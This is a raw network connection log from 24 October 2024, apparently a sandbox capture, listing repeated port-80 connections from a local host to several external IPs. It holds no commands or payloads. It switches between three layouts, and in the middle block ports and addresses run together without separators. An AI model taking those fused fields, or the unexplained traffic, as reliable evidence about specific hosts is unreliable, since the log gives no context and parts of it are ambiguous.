Oct 24, 2024 08:02:18.697928905 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697940111 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:19.405627966 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:19.405719995 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:19.656176090 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:19.656249046 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:20.198798895 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:20.204170942 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:21.220937014 CEST | 49851 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:21.226891041 CEST | 80 | 49851 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:21.227005959 CEST | 49851 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:21.235765934 CEST | 49851 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:21.241194010 CEST | 80 | 49851 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:21.861932993 CEST | 80 | 49851 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:21.862663031 CEST | 80 | 49851 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:21.866748095 CEST | 49851 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:21.888041019 CEST | 49851 | 80 | 192.168.2.4 | 3.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.893482924 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:27.502262115 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.507781029 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:27.507878065 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.519655943 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.525084972 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.449692011 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.495446920 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:28.626813889 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.627047062 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:29.026745081 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.049271107 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.054713964 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:30.054914951 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.067886114 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.073398113 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:30.985322952 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:31.026602983 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:31.153613091 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:31.154504061 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:31.573765039 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.593151093 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.598915100 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.599013090 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.610771894 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.616338968 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616370916 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616399050 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616425037 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616486073 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616513968 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616540909 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616568089 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616596937 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.537017107 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.589133978 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:33.715413094 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.715490103 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:34.120465040 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.140384912 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.145762920 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:35.145849943 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.155971050 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.161298990 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.082832098 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.136007071 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.258321047 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.258644104 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.261162043 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.266571045 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:41.281990051 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.287429094 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:41.287494898 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.300297022 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.305671930 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.002927065 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.040544987 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.042624950 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:42.810456038 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.827537060 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.833923101 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:43.833997011 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.846467972 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.853462934 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.565080881 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.603630066 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.605479002 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:45.354839087 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:46.374455929 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.102833986 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.102910042 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.123435974 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.129962921 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130002975 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130017042 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130053043 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130067110 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130083084 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130199909 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130213976 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130225897 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.805632114 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.846934080 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.847054005 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:48.638459921 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.655170918 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.660763025 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:49.660908937 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.668462038 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.673798084 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.352365971 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.390518904 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.391000032 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:50.392036915 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:50.397464991 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:55.429107904 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.434480906 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:55.434554100 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.446274996 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.451734066 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.273010015 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.395911932 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.397433043 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:56.949114084 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.968298912 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.974349022 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:57.975202084 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.987793922 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.993288040 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.821497917 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.870385885 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:58.943512917 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.943578959 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:59.496263981 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.518460035 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.525326967 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.525430918 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.537065983 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.544193983 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544208050 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544231892 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544245005 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544255972 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545854092 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545866966 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545891047 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545902967 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.385833025 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.433059931 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:01.508840084 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.508924007 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:02.209809065 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.220694065 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.227174044 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:03.227253914 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.236032009 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.241432905 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.071456909 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.071521044 CEST8050027217.160.0.231192.168.2.4
Timestamp                             SrcPort  DstPort  Source IP        Dest IP
Oct 24, 2024 08:03:04.071657896 CEST  50027    80       192.168.2.4      217.160.0.231
Oct 24, 2024 08:03:04.195100069 CEST  80       50027    217.160.0.231    192.168.2.4
Oct 24, 2024 08:03:04.195292950 CEST  50027    80       192.168.2.4      217.160.0.231
Oct 24, 2024 08:03:04.196506023 CEST  50027    80       192.168.2.4      217.160.0.231
Oct 24, 2024 08:03:04.202083111 CEST  80       50027    217.160.0.231    192.168.2.4
Oct 24, 2024 08:03:09.820111036 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:09.825890064 CEST  80       50028    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:09.826097012 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:09.837869883 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:09.843565941 CEST  80       50028    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:10.833158016 CEST  80       50028    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:10.911968946 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:11.038039923 CEST  80       50028    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:11.038105965 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:11.339248896 CEST  50028    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:12.359049082 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:12.365149021 CEST  80       50029    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:12.368618965 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:12.380589962 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:12.386389017 CEST  80       50029    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:13.393605947 CEST  80       50029    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:13.448530912 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:13.595442057 CEST  80       50029    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:13.595515966 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:13.913564920 CEST  50029    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:14.920716047 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:15.682512999 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.682622910 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:15.692692995 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:15.700335979 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.700378895 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.700408936 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.700437069 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.700469971 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.701549053 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.701622963 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.701653004 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:15.701679945 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:16.687108040 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:16.745452881 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:16.897763014 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:16.901345968 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:17.076153040 CEST  80       50030    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:17.076210022 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:17.198626041 CEST  50030    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:18.217183113 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:18.222846031 CEST  80       50031    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:18.225356102 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:18.232958078 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:18.238692999 CEST  80       50031    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:19.222012043 CEST  80       50031    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:19.276704073 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:19.422178030 CEST  80       50031    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:19.422319889 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:19.423176050 CEST  50031    80       192.168.2.4      54.179.173.60
Oct 24, 2024 08:03:19.428725004 CEST  80       50031    54.179.173.60    192.168.2.4
Oct 24, 2024 08:03:24.466502905 CEST  50032    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:24.472465992 CEST  80       50032    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:24.472624063 CEST  50032    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:24.486469030 CEST  50032    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:24.491938114 CEST  80       50032    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:25.997356892 CEST  50032    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:26.003283024 CEST  80       50032    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:26.003395081 CEST  50032    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:27.014930010 CEST  50033    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:27.021002054 CEST  80       50033    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:27.021275043 CEST  50033    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:27.035609007 CEST  50033    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:27.042114973 CEST  80       50033    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:27.648040056 CEST  80       50033    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:27.648221970 CEST  50033    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:28.542531967 CEST  50033    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:28.548142910 CEST  80       50033    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:29.561225891 CEST  50034    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:30.562563896 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.565207958 CEST  50034    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:30.577044010 CEST  50034    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:30.752285957 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.752720118 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.752762079 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.752940893 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.753021002 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.753552914 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.753596067 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.753652096 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:30.753679991 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:31.365880013 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:31.365938902 CEST  50034    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:32.089186907 CEST  50034    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:32.094806910 CEST  80       50034    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:33.108299971 CEST  50035    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:33.114470005 CEST  80       50035    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:33.114547968 CEST  50035    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:33.122854948 CEST  50035    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:33.128591061 CEST  80       50035    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:33.751420021 CEST  80       50035    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:33.752228022 CEST  80       50035    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:33.752288103 CEST  50035    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:33.754040956 CEST  50035    80       192.168.2.4      3.33.130.190
Oct 24, 2024 08:03:33.759900093 CEST  80       50035    3.33.130.190     192.168.2.4
Oct 24, 2024 08:03:47.187112093 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:47.192909956 CEST  80       50036    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:47.193105936 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:47.209918976 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:47.215379953 CEST  80       50036    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:48.209170103 CEST  80       50036    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:48.262622118 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:48.337796926 CEST  80       50036    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:48.338016987 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:48.714338064 CEST  50036    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:49.733314037 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:49.739242077 CEST  80       50037    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:49.739327908 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:49.753036022 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:49.758816957 CEST  80       50037    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:50.707211018 CEST  80       50037    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:50.762469053 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:50.889626026 CEST  80       50037    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:50.890552044 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:51.261121988 CEST  50037    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:52.280987978 CEST  50038    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:52.286920071 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.287023067 CEST  50038    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:52.297502041 CEST  50038    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:52.303178072 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303196907 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303210020 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303237915 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303252935 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303392887 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303406000 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303421974 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:52.303433895 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:53.452917099 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:53.453538895 CEST  80       50038    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:53.453727961 CEST  50038    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:53.807986021 CEST  50038    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:54.828488111 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:54.834423065 CEST  80       50039    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:54.840699911 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:54.845175982 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:54.850981951 CEST  80       50039    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:55.799308062 CEST  80       50039    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:55.854839087 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:55.982511044 CEST  80       50039    156.226.22.233   192.168.2.4
Oct 24, 2024 08:03:55.984822989 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:55.985842943 CEST  50039    80       192.168.2.4      156.226.22.233
Oct 24, 2024 08:03:55.991158009 CEST  80       50039    156.226.22.233   192.168.2.4
Oct 24, 2024 08:04:01.198311090 CEST  50040    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:01.204361916 CEST  80       50040    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:01.204545975 CEST  50040    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:01.215353966 CEST  50040    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:01.221235991 CEST  80       50040    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:01.869029999 CEST  80       50040    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:01.903156996 CEST  80       50040    52.20.84.62      192.168.2.4
Oct 24, 2024 08:04:01.903301001 CEST  50040    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:02.732929945 CEST  50040    80       192.168.2.4      52.20.84.62
Oct 24, 2024 08:04:03.750425100 CEST  50041    80       192.168.2.4      52.20.84.62
